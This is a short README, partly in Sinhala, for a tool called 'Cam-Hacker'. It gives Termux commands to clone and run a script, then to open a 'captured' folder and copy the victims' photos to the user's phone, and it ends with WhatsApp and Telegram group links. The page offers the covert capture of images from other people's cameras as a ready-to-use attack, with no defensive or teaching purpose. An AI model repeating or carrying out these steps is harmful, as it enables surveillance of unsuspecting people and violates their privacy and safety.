# Cam-Hacker

## Command list👇

>`apt update && apt upgrade -y`

>`pkg install git -y`

>`git clone http://github.com/DaVe-Smith-899/Cam-Hacker.git`

>`cd Cam-Hacker`

>`bash camhacker.sh`

➤දැන් ඔතන ෆොටෝ වැදුනා කියලා වැටුනට පස්සේ මේ කමාන්ඩ් ගහලා ෆොටෝ ටික save කර ගන්න

>`cd captured`

>`ls`

දැන් ෆොටෝ ටික ෆෝන් එකට කොපි කර ගන්න🖤

<hr colour="Red" size="10">
<h3>JOIN US :<h3/>
<img src="400086900718_114430.jpg">

<br>


පල්ලැහා button click කරලා join වෙන්න 🖤

<a href="https://chat.whatsapp.com/DWMOhdZv78RHfYpmVfjBuS"> Whatsapp </a>

<a href="http://t.me/By_sstp"> Telegram  </a>

<hr colour="Red" size="10">


